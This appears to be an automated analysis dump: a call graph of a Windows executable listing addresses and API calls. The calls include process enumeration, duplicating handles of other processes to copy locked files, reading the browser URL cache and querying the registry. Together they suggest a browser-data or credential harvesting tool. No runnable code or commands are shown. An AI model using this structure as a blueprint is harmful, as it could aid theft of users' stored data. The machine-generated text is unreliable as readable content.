??3@YAXPAX ??3@YAXPAX 39288->39943 39290 403a12 wcsrchr 39290->39021 39291 4039a3 39291->39288 39294 4039f4 39291->39294 39940 40a02c CreateFileW 39291->39940 39294->39288 39295 4099c6 2 API calls 39294->39295 39295->39288 39297 414c2e 16 API calls 39296->39297 39298 404048 39297->39298 39299 414c2e 16 API calls 39298->39299 39300 404056 39299->39300 39301 409d1f 6 API calls 39300->39301 39302 404073 39301->39302 39303 409d1f 6 API calls 39302->39303 39304 40408e 39303->39304 39305 409d1f 6 API calls 39304->39305 39306 4040a6 39305->39306 39307 403af5 20 API calls 39306->39307 39308 4040ba 39307->39308 39309 403af5 20 API calls 39308->39309 39310 4040cb 39309->39310 39970 40414f memset 39310->39970 39371 40b633 ??3@YAXPAX 39370->39371 39372 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39371->39372 39373 413f00 Process32NextW 39372->39373 39374 413da5 OpenProcess 39373->39374 39375 413f17 CloseHandle 39373->39375 39376 413df3 memset 39374->39376 39379 413eb0 39374->39379 39375->39116 40237 413f27 39376->40237 39378 413ebf ??3@YAXPAX 39378->39379 39379->39373 39379->39378 39380 4099f4 3 API calls 39379->39380 39380->39379 39383 413e1f 39388 414c2e 16 API calls 39387->39388 39389 403eb7 39388->39389 39390 414c2e 16 API calls 39389->39390 39391 403ec5 39390->39391 39392 409d1f 6 API calls 39391->39392 39393 403ee2 39392->39393 39394 409d1f 6 API calls 39393->39394 39395 403efd 39394->39395 39396 409d1f 6 API calls 39395->39396 39397 403f15 39396->39397 39398 403af5 20 API calls 39397->39398 39399 403f29 39398->39399 39400 403af5 20 API calls 39399->39400 39401 403f3a 39400->39401 39402 40414f 33 API calls 39401->39402 39407 403f4f 39402->39407 39403 403faf 40272 40b1ab ??3@YAXPAX ??3@YAXPAX 39403->40272 39405 403f5b memset 39405->39407 39406 403fb7 39406->39062 39407->39403 39407->39405 39408 4099c6 2 API calls 39407->39408 39409 40a8ab 9 API calls 39407->39409 39408->39407 39409->39407 39411 414c2e 16 API calls 39410->39411 39412 403d26 39411->39412 39413 414c2e 16 API calls 39412->39413 39414 403d34 39413->39414 39415 409d1f 6 API calls 39414->39415 39416 403d51 39415->39416 39417 409d1f 6 API calls 39416->39417 39418 403d6c 39417->39418 39419 409d1f 6 API calls 39418->39419 39420 403d84 39419->39420 39421 403af5 20 API calls 39420->39421 39422 403d98 39421->39422 39423 403af5 20 API calls 39422->39423 39424 403da9 39423->39424 39425 40414f 33 API calls 39424->39425 39426 403dbe 39425->39426 39427 403e1e 39426->39427 39428 403dca memset 39426->39428 39431 4099c6 2 API calls 39426->39431 39432 40a8ab 9 API calls 39426->39432 40273 40b1ab ??3@YAXPAX ??3@YAXPAX 39427->40273 39428->39426 39430 403e26 39430->39066 39431->39426 39432->39426 39434 414b81 9 API calls 39433->39434 39435 414c40 39434->39435 39436 414c73 memset 39435->39436 40274 409cea 39435->40274 39437 414c94 39436->39437 40277 414592 RegOpenKeyExW 39437->40277 39440 414c64 39440->39056 39442 414cc1 39443 414cf4 wcscpy 39442->39443 40278 414bb0 wcscpy 39442->40278 39443->39440 39445 414cd2 40279 4145ac RegQueryValueExW 39445->40279 39447 414ce9 RegCloseKey 39447->39443 39449 409d62 39448->39449 39450 409d43 wcscpy 39448->39450 39449->39098 39451 409719 2 API calls 39450->39451 39452 409d51 wcscat 39451->39452 39452->39449 39454 40aebe FindClose 39453->39454 39455 40ae21 39454->39455 39456 4099c6 2 API calls 39455->39456 39457 40ae35 39456->39457 39458 409d1f 6 API calls 39457->39458 39459 40ae49 39458->39459 39459->39133 39461 40ade0 39460->39461 39462 40ae0f 39460->39462 39461->39462 39463 40ade7 wcscmp 39461->39463 39462->39133 39463->39462 39464 40adfe wcscmp 39463->39464 39464->39462 39466 40ae18 9 API calls 39465->39466 39468 4453c4 39466->39468 39467 40ae51 9 API calls 39467->39468 39468->39467 39469 4453f3 39468->39469 39470 40add4 2 API calls 39468->39470 39473 445403 253 API calls 39468->39473 39471 40aebe FindClose 39469->39471 39470->39468 39472 4453fe 39471->39472 39472->39133 39473->39468 39475 40ae7b FindNextFileW 39474->39475 39476 40ae5c FindFirstFileW 39474->39476 39477 40ae94 39475->39477 39478 40ae8f 39475->39478 39476->39477 39480 40aeb6 39477->39480 39481 409d1f 6 API calls 39477->39481 39479 40aebe FindClose 39478->39479 39479->39477 39480->39133 39481->39480 39483->39119 39484->39100 39486->39134 39497->39018 39498->39068 39499->39082 39501 44db70 39500->39501 39502 40b6fc memset 39501->39502 39503 409c70 2 API calls 39502->39503 39504 40b732 wcsrchr 39503->39504 39505 40b743 39504->39505 39506 40b746 memset 39504->39506 39505->39506 39507 40b2cc 27 API calls 39506->39507 39508 40b76f 39507->39508 39509 409d1f 6 API calls 39508->39509 39510 40b783 39509->39510 40280 409b98 GetFileAttributesW 39510->40280 39512 40b792 39513 40b7c2 39512->39513 39514 409c70 2 API calls 39512->39514 40281 40bb98 39513->40281 39516 40b7a5 39514->39516 39518 40b2cc 27 API calls 39516->39518 39522 40b7b2 39518->39522 39519 40b837 FindCloseChangeNotification 39521 40b83e memset 39519->39521 39520 40b817 40326 409a45 GetTempPathW 39520->40326 40314 40a6e6 WideCharToMultiByte 39521->40314 39525 409d1f 6 API calls 39522->39525 39525->39513 39526 40b827 CopyFileW 39526->39521 39527 40b866 39528 444432 121 API calls 39527->39528 39529 40b879 39528->39529 39530 40bad5 39529->39530 39531 40b273 27 API calls 39529->39531 39532 40baeb 39530->39532 39533 40bade DeleteFileW 39530->39533 39534 40b89a 39531->39534 39535 40b04b ??3@YAXPAX 39532->39535 39533->39532 39536 438552 134 API calls 39534->39536 39537 40baf3 39535->39537 39538 40b8a4 39536->39538 39537->39092 39539 40bacd 39538->39539 39541 4251c4 137 API calls 39538->39541 39540 443d90 111 API calls 39539->39540 39540->39530 39564 40b8b8 39541->39564 39542 40bac6 39543 40b8bd memset 39546 425413 17 API calls 39546->39564 39549 40a71b MultiByteToWideChar 39549->39564 39550 40a734 MultiByteToWideChar 39550->39564 39551 4253af 17 API calls 39551->39564 39552 4253cf 17 API calls 39552->39564 39553 40b9b5 memcmp 39553->39564 39554 4099c6 2 API calls 39554->39564 39555 404423 37 API calls 39555->39564 39557 40bb3e memset memcpy 39558 4251c4 137 API calls 39558->39564 39564->39542 39564->39543 39564->39546 39564->39549 39564->39550 39564->39551 39564->39552 39564->39553 39564->39554 39564->39555 39564->39557 39564->39558 39565 40ba5f memcmp 39564->39565 39566 4099f4 3 API calls 39564->39566 40315 4253ef 39564->40315 39565->39564 39566->39564 39567->39094 39569 40aed1 39568->39569 39570 40aec7 FindClose 39568->39570 39569->39027 39570->39569 39572 4099d7 39571->39572 39573 4099da memcpy 39571->39573 39572->39573 39573->39077 39575 40b2cc 27 API calls 39574->39575 39576 44543f 39575->39576 39577 409d1f 6 API calls 39576->39577 39578 44544f 39577->39578 40431 409b98 GetFileAttributesW 39578->40431 39580 44545e 39581 445476 39580->39581 39582 40b6ef 252 API calls 39580->39582 39583 40b2cc 27 API calls 39581->39583 39582->39581 39584 445482 39583->39584 39585 409d1f 6 API calls 39584->39585 39586 445492 39585->39586 40432 409b98 GetFileAttributesW 39586->40432 39588 4454a1 39589 4454b9 39588->39589 39590 40b6ef 252 API calls 39588->39590 39589->39108 39590->39589 39591->39107 39592->39124 39593->39130 39594->39167 39595->39149 39596->39194 39597->39194 39598->39177 39599->39205 39600->39207 39601->39209 39603 414c2e 16 API calls 39602->39603 39604 40c2ae 39603->39604 39674 40c1d3 39604->39674 39609 40c3be 39626 40a8ab 39609->39626 39610 40afcf 2 API calls 39611 40c2fd FindFirstUrlCacheEntryW 39610->39611 39612 40c3b6 39611->39612 39613 40c31e wcschr 39611->39613 39614 40b04b ??3@YAXPAX 39612->39614 39615 40c331 39613->39615 39616 40c35e FindNextUrlCacheEntryW 39613->39616 39614->39609 39617 40a8ab 9 API calls 39615->39617 39616->39613 39618 40c373 GetLastError 39616->39618 39621 40c33e wcschr 39617->39621 39619 40c3ad FindCloseUrlCache 39618->39619 39620 40c37e 39618->39620 39619->39612 39622 40afcf 2 API calls 39620->39622 39621->39616 39623 40c34f 39621->39623 39624 40c391 FindNextUrlCacheEntryW 39622->39624 39625 40a8ab 9 API calls 39623->39625 39624->39613 39624->39619 39625->39616 39790 40a97a 39626->39790 39629 40a8cc 39629->39216 39630 40a8d0 7 API calls 39630->39629 39795 40b1ab ??3@YAXPAX ??3@YAXPAX 39631->39795 39633 40c3dd 39634 40b2cc 27 API calls 39633->39634 39635 40c3e7 39634->39635 39796 414592 RegOpenKeyExW 39635->39796 39637 40c3f4 39638 40c50e 39637->39638 39639 40c3ff 39637->39639 39653 405337 39638->39653 39640 40a9ce 4 API calls 39639->39640 39641 40c418 memset 39640->39641 39797 40aa1d 39641->39797 39799 405220 39653->39799 39675 40ae18 9 API calls 39674->39675 39681 40c210 39675->39681 39676 40ae51 9 API calls 39676->39681 39677 40c264 39678 40aebe FindClose 39677->39678 39680 40c26f 39678->39680 39679 40add4 2 API calls 39679->39681 39686 40e5ed memset memset 39680->39686 39681->39676 39681->39677 39681->39679 39682 40c231 _wcsicmp 39681->39682 39683 40c1d3 35 API calls 39681->39683 39682->39681 39684 40c248 39682->39684 39683->39681 39699 40c084 22 API calls 39684->39699 39687 414c2e 16 API calls 39686->39687 39688 40e63f 39687->39688 39689 409d1f 6 API calls 39688->39689 39690 40e658 39689->39690 39700 409b98 GetFileAttributesW 39690->39700 39692 40e667 39694 409d1f 6 API calls 39692->39694 39695 40e680 39692->39695 39694->39695 39701 409b98 GetFileAttributesW 39695->39701 39696 40e68f 39697 40c2d8 39696->39697 39702 40e4b2 39696->39702 39697->39609 39697->39610 39699->39681 39700->39692 39701->39696 39723 40e01e 39702->39723 39704 40e593 39705 40e5b0 39704->39705 39706 40e59c DeleteFileW 39704->39706 39707 40b04b ??3@YAXPAX 39705->39707 39706->39705 39709 40e5bb 39707->39709 39708 40e521 39708->39704 39746 40e175 39708->39746 39711 40e5c4 CloseHandle 39709->39711 39712 40e5cc 39709->39712 39711->39712 39714 40b633 ??3@YAXPAX 39712->39714 39713 40e573 39715 40e584 39713->39715 39716 40e57c FindCloseChangeNotification 39713->39716 39717 40e5db 39714->39717 39789 40b1ab ??3@YAXPAX ??3@YAXPAX 39715->39789 39716->39715 39720 40b633 ??3@YAXPAX 39717->39720 39719 40e540 39719->39713 39766 40e2ab 39719->39766 39721 40e5e3 39720->39721 39721->39697 39724 406214 22 API calls 39723->39724 39725 40e03c 39724->39725 39726 40e16b 39725->39726 39727 40dd85 74 API calls 39725->39727 39726->39708 39728 40e06b 39727->39728 39728->39726 39729 40afcf ??2@YAPAXI ??3@YAXPAX 39728->39729 39730 40e08d OpenProcess 39729->39730 39731 40e0a4 GetCurrentProcess DuplicateHandle 39730->39731 39735 40e152 39730->39735 39732 40e0d0 GetFileSize 39731->39732 39733 40e14a CloseHandle 39731->39733 39736 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39732->39736 39733->39735 39734 40e160 39738 40b04b ??3@YAXPAX 39734->39738 39735->39734 39737 406214 22 API calls 39735->39737 39739 40e0ea 39736->39739 39737->39734 39738->39726 39740 4096dc CreateFileW 39739->39740 39741 40e0f1 CreateFileMappingW 39740->39741 39742 40e140 CloseHandle CloseHandle 39741->39742 39743 40e10b MapViewOfFile 39741->39743 39742->39733 39744 40e13b FindCloseChangeNotification 39743->39744 39745 40e11f WriteFile UnmapViewOfFile 39743->39745 39744->39742 39745->39744 39747 40e18c 39746->39747 39748 406b90 11 API calls 39747->39748 39749 40e19f 39748->39749 39750 40e1a7 memset 39749->39750 39751 40e299 39749->39751 39757 40e1e8 39750->39757 39752 4069a3 ??3@YAXPAX ??3@YAXPAX 39751->39752 39753 40e2a4 39752->39753 39753->39719 39754 406e8f 13 API calls 39754->39757 39755 406b53 SetFilePointerEx ReadFile 39755->39757 39756 40dd50 _wcsicmp 39756->39757 39757->39754 39757->39755 39757->39756 39758 40e283 39757->39758 39762 40742e 8 API calls 39757->39762 39763 40aae3 wcslen wcslen _memicmp 39757->39763 39764 40e244 _snwprintf 39757->39764 39759 40e291 39758->39759 39760 40e288 ??3@YAXPAX 39758->39760 39761 40aa04 ??3@YAXPAX 39759->39761 39760->39759 39761->39751 39762->39757 39763->39757 39765 40a8d0 7 API calls 39764->39765 39765->39757 39767 40e2c2 39766->39767 39768 406b90 11 API calls 39767->39768 39779 40e2d3 39768->39779 39769 40e4a0 39770 4069a3 ??3@YAXPAX ??3@YAXPAX 39769->39770 39772 40e4ab 39770->39772 39771 406e8f 13 API calls 39771->39779 39772->39719 39773 406b53 SetFilePointerEx ReadFile 39773->39779 39774 40e489 39775 40aa04 ??3@YAXPAX 39774->39775 39777 40e491 39775->39777 39776 40dd50 _wcsicmp 39776->39779 39777->39769 39778 40e497 ??3@YAXPAX 39777->39778 39778->39769 39779->39769 39779->39771 39779->39773 39779->39774 39779->39776 39780 40dd50 _wcsicmp 39779->39780 39783 40742e 8 API calls 39779->39783 39784 40e3e0 memcpy 39779->39784 39785 40e3b3 wcschr 39779->39785 39786 40e3fb memcpy 39779->39786 39787 40e416 memcpy 39779->39787 39788 40e431 memcpy 39779->39788 39781 40e376 memset 39780->39781 39782 40aa29 6 API calls 39781->39782 39782->39779 39783->39779 39784->39779 39785->39779 39786->39779 39787->39779 39788->39779 39789->39704 39792 40a980 39790->39792 39791 40a8bb 39791->39629 39791->39630 39792->39791 39793 40a995 _wcsicmp 39792->39793 39794 40a99c wcscmp 39792->39794 39793->39792 39794->39792 39795->39633 39796->39637 39798 40aa23 RegEnumValueW 39797->39798 39800 405335 39799->39800 39801 40522a 39799->39801 39800->39223 39802 40b2cc 27 API calls 39801->39802 39930 403a29 39929->39930 39944 403bed memset memset 39930->39944 39932 403ae7 39957 40b1ab ??3@YAXPAX ??3@YAXPAX 39932->39957 39933 403a3f memset 39938 403a2f 39933->39938 39935 403aef 39935->39291 39936 409d1f 6 API calls 39936->39938 39937 409b98 GetFileAttributesW 39937->39938 39938->39932 39938->39933 39938->39936 39938->39937 39939 40a8d0 7 API calls 39938->39939 39939->39938 39941 40a051 GetFileTime FindCloseChangeNotification 39940->39941 39942 4039ca CompareFileTime 39940->39942 39941->39942 39942->39291 39943->39290 39945 414c2e 16 API calls 39944->39945 39946 403c38 39945->39946 39947 409719 2 API calls 39946->39947 39948 403c3f wcscat 39947->39948 39949 414c2e 16 API calls 39948->39949 39950 403c61 39949->39950 39951 409719 2 API calls 39950->39951 39952 403c68 wcscat 39951->39952 39958 403af5 39952->39958 39955 403af5 20 API calls 39956 403c95 39955->39956 39956->39938 39957->39935 39959 403b02 39958->39959 39960 40ae18 9 API calls 39959->39960 39968 403b37 39960->39968 39961 403bdb 39963 40aebe FindClose 39961->39963 39962 40add4 wcscmp wcscmp 39962->39968 39964 403be6 39963->39964 39964->39955 39965 40ae18 9 API calls 39965->39968 39966 40ae51 9 API calls 39966->39968 39967 40aebe FindClose 39967->39968 39968->39961 39968->39962 39968->39965 39968->39966 39968->39967 39969 40a8d0 7 API calls 39968->39969 39969->39968 39971 409d1f 6 API calls 39970->39971 39972 404190 39971->39972 39985 409b98 GetFileAttributesW 39972->39985 40264 413f4f 40237->40264 40240 413f37 K32GetModuleFileNameExW 40241 413f4a 40240->40241 40241->39383 40265 413f2f 40264->40265 40266 413f54 40264->40266 40265->40240 40265->40241 40267 40a804 8 API calls 40266->40267 40268 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 40267->40268 40268->40265 40272->39406 40273->39430 40275 409cf9 GetVersionExW 40274->40275 40276 409d0a 40274->40276 40275->40276 40276->39436 40276->39440 40277->39442 40278->39445 40279->39447 40280->39512 40282 40bba5 40281->40282 40335 40cc26 40282->40335 40285 40bd4b 40363 40cc0c 40285->40363 40290 40b2cc 27 API calls 40291 40bbef 40290->40291 40356 40ccf0 40291->40356 40293 40bbf5 40293->40285 40360 40ccb4 40293->40360 40296 40cf04 17 API calls 40297 40bc2e 40296->40297 40298 40bd43 40297->40298 40299 40b2cc 27 API calls 40297->40299 40300 40cc0c 4 API calls 40298->40300 40301 40bc40 40299->40301 40300->40285 40302 40ccf0 _wcsicmp 40301->40302 40303 40bc46 40302->40303 40303->40298 40314->39527 40327 409a74 GetTempFileNameW 40326->40327 40328 409a66 GetWindowsDirectoryW 40326->40328 40327->39526 40328->40327 40371 4096c3 CreateFileW 40335->40371 40337 40cc34 40338 40cc3d GetFileSize 40337->40338 40339 40bbca 40337->40339 40340 40afcf 2 API calls 40338->40340 40339->40285 40347 40cf04 40339->40347 40341 40cc64 40340->40341 40372 40a2ef ReadFile 40341->40372 40343 40cc71 40373 40ab4a MultiByteToWideChar 40343->40373 40345 40cc95 FindCloseChangeNotification 40346 40b04b ??3@YAXPAX 40345->40346 40346->40339 40348 40b633 ??3@YAXPAX 40347->40348 40349 40cf14 40348->40349 40379 40b1ab ??3@YAXPAX ??3@YAXPAX 40349->40379 40351 40bbdd 40351->40285 40351->40290 40352 40cf1b 40352->40351 40354 40cfef 40352->40354 40380 40cd4b 40352->40380 40355 40cd4b 14 API calls 40354->40355 40355->40351 40357 40cd3f 40356->40357 40358 40ccfd 40356->40358 40357->40293 40358->40357 40359 40cd26 _wcsicmp 40358->40359 40359->40357 40359->40358 40361 40aa29 6 API calls 40360->40361 40362 40bc26 40361->40362 40362->40296 40364 40b633 ??3@YAXPAX 40363->40364 40365 40cc15 40364->40365 40366 40aa04 ??3@YAXPAX 40365->40366 40367 40cc1d 40366->40367 40429 40b1ab ??3@YAXPAX ??3@YAXPAX 40367->40429 40369 40b7d4 memset CreateFileW 40369->39519 40369->39520 40371->40337 40372->40343 40374 40ab6b 40373->40374 40378 40ab93 40373->40378 40375 40a9ce 4 API calls 40374->40375 40376 40ab74 40375->40376 40377 40ab7c MultiByteToWideChar 40376->40377 40377->40378 40378->40345 40379->40352 40381 40cd7b 40380->40381 40414 40aa29 40381->40414 40383 40cef5 40384 40aa04 ??3@YAXPAX 40383->40384 40385 40cefd 40384->40385 40385->40352 40387 40aa29 6 API calls 40388 40ce1d 40387->40388 40389 40aa29 6 API calls 40388->40389 40390 40ce3e 40389->40390 40391 40ce6a 40390->40391 40422 40abb7 wcslen memmove 40390->40422 40392 40ce9f 40391->40392 40425 40abb7 wcslen memmove 40391->40425 40394 40a8d0 7 API calls 40392->40394 40397 40ceb5 40394->40397 40395 40ce56 40423 40aa71 wcslen 40395->40423 40404 40a8d0 7 API calls 40397->40404 40399 40ce8b 40426 40aa71 wcslen 40399->40426 40401 40ce5e 40424 40abb7 wcslen memmove 40401->40424 40402 40ce93 40427 40abb7 wcslen memmove 40402->40427 40406 40cecb 40404->40406 40428 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 40406->40428 40415 40aa33 40414->40415 40421 40aa63 40414->40421 40416 40aa44 40415->40416 40417 40aa38 wcslen 40415->40417 40418 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 40416->40418 40417->40416 40419 40aa4d 40418->40419 40420 40aa51 memcpy 40419->40420 40419->40421 40420->40421 40421->40383 40421->40387 40422->40395 40423->40401 40424->40391 40425->40399 40426->40402 40427->40392 40429->40369 40431->39580 40432->39588 40502 44def7 40503 44df07 40502->40503 40504 44df00 ??3@YAXPAX 40502->40504 40505 44df17 40503->40505 40506 44df10 ??3@YAXPAX 40503->40506 40504->40503 40507 44df27 40505->40507 40508 44df20 ??3@YAXPAX 40505->40508 40506->40505 40509 44df37 40507->40509 40510 44df30 ??3@YAXPAX 40507->40510 40508->40507 40510->40509 37862 44188c 147 API calls 37672 44dea5 37673 44deb5 FreeLibrary 37672->37673 37674 44dec3 37672->37674 37673->37674 40511 40b0b5 ??3@YAXPAX ??3@YAXPAX 40512 4148b6 FindResourceW 40513 4148f9 40512->40513 40514 4148cf SizeofResource 40512->40514 40514->40513 40515 4148e0 LoadResource 40514->40515 40515->40513 40516 4148ee LockResource 40515->40516 40516->40513 40433 442774 40434 442799 40433->40434 40435 44277b 40433->40435 40458 42bf4c 40434->40458 40450 42b63e 40435->40450 40442 4427ba 40472 42c00a 11 API calls 40442->40472 40444 441897 40445 4418ea 40444->40445 40446 442bd4 40444->40446 40447 4418e2 40444->40447 40446->40445 40474 441409 memset 40446->40474 40447->40445 40473 4414a9 12 API calls 40447->40473 40475 42b4ec 40450->40475 40452 42b64c 40481 42b5e4 40452->40481 40454 42b65e 40455 42b66d 40454->40455 40488 42b3c6 11 API calls 40454->40488 40457 42b1b5 17 API calls 40455->40457 40457->40434 40459 42bf5f 40458->40459 40460 42bf56 40458->40460 40462 42bfae memset 40459->40462 40463 415b2c 11 API calls 40459->40463 40464 42bf84 40459->40464 40461 415a91 memset 40460->40461 40461->40459 40470 42bf91 40462->40470 40465 42bf7f 40463->40465 40491 42b896 memset 40464->40491 40465->40464 40466 42bf98 40465->40466 40466->40462 40468 42bf8b 40492 42c02e memset 40468->40492 40471 42bfcf memcpy 40470->40471 40471->40442 40472->40444 40473->40445 40474->40446 40476 42b4ff 40475->40476 40477 415a91 memset 40476->40477 40478 42b52c 40477->40478 40479 42b553 memcpy 40478->40479 40480 42b545 40478->40480 40479->40480 40480->40452 40482 42b5eb 40481->40482 40486 42b604 40481->40486 40489 42b896 memset 40482->40489 40484 42b5f5 40490 42b896 memset 40484->40490 40486->40454 40487 42b5ff 40487->40454 40488->40455 40489->40484 40490->40487 40491->40468 40492->40470 37856 415304 ??3@YAXPAX 37863 441892 147 API calls 37863->37863 37675 415320 realloc 37676 415340 37675->37676 37677 41534d 37675->37677 37679 416760 11 API calls 37677->37679 37679->37676 40517 441b3f 40527 43a9f6 40517->40527 40519 441b61 40700 4386af memset 40519->40700 40521 44189a 40522 4418e2 40521->40522 40524 442bd4 40521->40524 40525 4418ea 40522->40525 40701 4414a9 12 API calls 40522->40701 40524->40525 40702 441409 memset 40524->40702 40528 43aa20 40527->40528 40529 43aadf 40527->40529 40528->40529 40530 43aa34 memset 40528->40530 40529->40519 40531 43aa56 40530->40531 40532 43aa4d 40530->40532 40703 43a6e7 40531->40703 40711 42c02e memset 40532->40711 40537 43aad3 40713 4169a7 11 API calls 40537->40713 40538 43aaae 40538->40529 40538->40537 40553 43aae5 40538->40553 40539 43ac18 40542 43ac47 40539->40542 40715 42bbd5 memcpy memcpy memcpy memset memcpy 40539->40715 40543 43aca8 40542->40543 40716 438eed 16 API calls 40542->40716 40547 43acd5 40543->40547 40718 4233ae 11 API calls 40543->40718 40546 43ac87 40717 4233c5 16 API calls 40546->40717 40719 423426 11 API calls 40547->40719 40551 43ace1 40720 439811 163 API calls 40551->40720 40552 43a9f6 161 API calls 40552->40553 40553->40529 40553->40539 40553->40552 40714 439bbb 22 API calls 40553->40714 40555 43acfd 40560 43ad2c 40555->40560 40721 438eed 16 API calls 40555->40721 40557 43ad19 40722 4233c5 16 API calls 40557->40722 40559 43ad58 40723 44081d 163 API calls 40559->40723 40560->40559 40563 43add9 40560->40563 40727 423426 11 API calls 40563->40727 40564 43ae3a memset 40565 43ae73 40564->40565 40728 42e1c0 147 API calls 40565->40728 40566 43adab 40725 438c4e 163 API calls 40566->40725 40567 43ad6c 40567->40529 40567->40566 40724 42370b memset memcpy memset 40567->40724 40571 43adcc 40726 440f84 12 API calls 40571->40726 40572 43ae96 40729 42e1c0 147 API calls 40572->40729 40575 43aea8 40576 43aec1 40575->40576 40730 42e199 147 API calls 40575->40730 40577 43af00 40576->40577 40731 42e1c0 147 API calls 40576->40731 40577->40529 40581 43af1a 40577->40581 40582 43b3d9 40577->40582 40732 438eed 16 API calls 40581->40732 40587 43b3f6 40582->40587 40588 43b4c8 40582->40588 40583 43b60f 40583->40529 40791 4393a5 17 API calls 40583->40791 40586 43af2f 40733 4233c5 16 API calls 40586->40733 40773 432878 12 API calls 40587->40773 40592 43b4f2 40588->40592 40779 42bbd5 memcpy memcpy memcpy memset memcpy 40588->40779 40590 43af51 40734 423426 11 API calls 40590->40734 40780 43a76c 21 API calls 40592->40780 40594 43af7d 40735 423426 11 API calls 40594->40735 40598 43b529 40781 44081d 163 API calls 40598->40781 40599 43b462 40775 423330 11 API calls 40599->40775 40600 43af94 40736 423330 11 API calls 40600->40736 40604 43afca 40737 423330 11 API calls 40604->40737 40605 43b47e 40609 43b497 40605->40609 40776 42374a memcpy memset memcpy memcpy memcpy 40605->40776 40606 43b544 40610 43b55c 40606->40610 40782 42c02e memset 40606->40782 40607 43b428 40607->40599 40774 432b60 16 API calls 40607->40774 40777 4233ae 11 API calls 40609->40777 40783 43a87a 163 API calls 40610->40783 40612 43afdb 40738 4233ae 11 API calls 40612->40738 40617 43b56c 40621 43b58a 40617->40621 40784 423330 11 API calls 40617->40784 40618 43b4b1 40778 423399 11 API calls 40618->40778 40620 43afee 40739 44081d 163 API calls 40620->40739 40785 440f84 12 API calls 40621->40785 40622 43b4c1 40787 42db80 163 API calls 40622->40787 40627 43b592 40786 43a82f 16 API calls 40627->40786 40630 43b5b4 40788 438c4e 163 API calls 40630->40788 40632 43b5cf 40789 42c02e memset 40632->40789 40634 43b005 40634->40529 40638 43b01f 40634->40638 40740 42d836 163 API calls 40634->40740 40635 43b1ef 40750 4233c5 16 API calls 40635->40750 40638->40635 40748 423330 11 API calls 40638->40748 40749 42d71d 163 API calls 40638->40749 40639 43b212 40751 423330 11 API calls 40639->40751 40641 43b087 40741 4233ae 11 API calls 40641->40741 40642 43add4 40642->40583 40790 438f86 16 API calls 40642->40790 40645 43b22a 40752 42ccb5 11 API calls 40645->40752 40648 43b23f 40753 4233ae 11 API calls 40648->40753 40649 43b10f 40744 423330 11 API calls 40649->40744 40651 43b257 40754 4233ae 11 API calls 40651->40754 40655 43b129 40745 4233ae 11 API calls 40655->40745 40656 43b26e 40755 4233ae 11 API calls 40656->40755 40659 43b09a 40659->40649 40742 42cc15 19 API calls 40659->40742 40743 4233ae 11 API calls 40659->40743 40660 43b282 40756 43a87a 163 API calls 40660->40756 40662 43b13c 40746 440f84 12 API calls 40662->40746 40664 43b29d 40757 423330 11 API calls 40664->40757 40667 43b15f 40747 4233ae 11 API calls 40667->40747 40668 43b2af 40669 43b2b8 40668->40669 40670 43b2ce 40668->40670 40758 4233ae 11 API calls 40669->40758 40759 440f84 12 API calls 40670->40759 40674 43b2c9 40761 4233ae 11 API calls 40674->40761 40675 43b2da 40760 42370b memset memcpy memset 40675->40760 40678 43b2f9 40762 423330 11 API calls 40678->40762 40680 43b30b 40763 423330 11 API calls 40680->40763 40682 43b325 40764 423399 11 API calls 40682->40764 40684 43b332 40765 4233ae 11 API calls 40684->40765 40686 43b354 40766 423399 11 API calls 40686->40766 40688 43b364 40767 43a82f 16 API calls 40688->40767 40690 43b370 40768 42db80 163 API calls 40690->40768 40692 43b380 40769 438c4e 163 API calls 40692->40769 40694 43b39e 40770 423399 11 API calls 40694->40770 40696 43b3ae 40771 43a76c 21 API calls 40696->40771 40698 43b3c3 40772 423399 11 API calls 40698->40772 40700->40521 40701->40525 40702->40524 40704 43a6f5 40703->40704 40707 43a765 40703->40707 40704->40707 40792 42a115 40704->40792 40707->40529 40712 4397fd memset 40707->40712 40709 43a73d 40709->40707 40710 42a115 147 API calls 40709->40710 40710->40707 40711->40531 40712->40538 40713->40529 40714->40553 40715->40542 40716->40546 40717->40543 40718->40547 40719->40551 40720->40555 40721->40557 40722->40560 40723->40567 40724->40566 40725->40571 40726->40642 40727->40564 40728->40572 40729->40575 40730->40576 40731->40576 40732->40586 40733->40590 40734->40594 40735->40600 40736->40604 40737->40612 40738->40620 40739->40634 40740->40641 40741->40659 40742->40659 40743->40659 40744->40655 40745->40662 40746->40667 40747->40638 40748->40638 40749->40638 40750->40639 40751->40645 40752->40648 40753->40651 40754->40656 40755->40660 40756->40664 40757->40668 40758->40674 40759->40675 40760->40674 40761->40678 40762->40680 40763->40682 40764->40684 40765->40686 40766->40688 40767->40690 40768->40692 40769->40694 40770->40696 40771->40698 40772->40642 40773->40607 40774->40599 40775->40605 40776->40609 40777->40618 40778->40622 40779->40592 40780->40598 40781->40606 40782->40610 40783->40617 40784->40621 40785->40627 40786->40622 40787->40630 40788->40632 40789->40642 40790->40583 40791->40529 40793 42a175 40792->40793 40795 42a122 40792->40795 40793->40707 40798 42b13b 147 API calls 40793->40798 40795->40793 40796 42a115 147 API calls 40795->40796 40799 43a174 40795->40799 40823 42a0a8 147 API calls 40795->40823 40796->40795 40798->40709 40813 43a196 40799->40813 40814 43a19e 40799->40814 40800 43a306 40800->40813 40836 4388c4 14 API calls 40800->40836 40803 42a115 147 API calls 40803->40814 40804 415a91 memset 40804->40814 40805 43a642 40805->40813 40839 4169a7 11 API calls 40805->40839 40807 4165ff 11 API calls 40807->40814 40809 43a635 40838 42c02e memset 40809->40838 40813->40795 40814->40800 40814->40803 40814->40804 40814->40807 40814->40813 40824 42ff8c 40814->40824 40832 439504 13 API calls 40814->40832 40833 4312d0 147 API calls 40814->40833 40834 42be4c memcpy memcpy memcpy memset memcpy 40814->40834 40835 43a121 11 API calls 40814->40835 40815 43a325 40815->40805 40815->40809 40815->40813 40817 42bf4c 14 API calls 40815->40817 40818 4169a7 11 API calls 40815->40818 40819 42b5b5 memset memcpy 40815->40819 40820 42b63e 14 API calls 40815->40820 40822 4165ff 11 API calls 40815->40822 40837 42bfcf memcpy 40815->40837 40817->40815 40818->40815 40819->40815 40820->40815 40822->40815 40823->40795 40825 43817e 139 API calls 40824->40825 40827 42ff99 40825->40827 40826 42ff9d 40826->40814 40827->40826 40828 42ffe3 40827->40828 40829 42ffd0 40827->40829 40841 4169a7 11 API calls 40828->40841 40840 4169a7 11 API calls 40829->40840 40832->40814 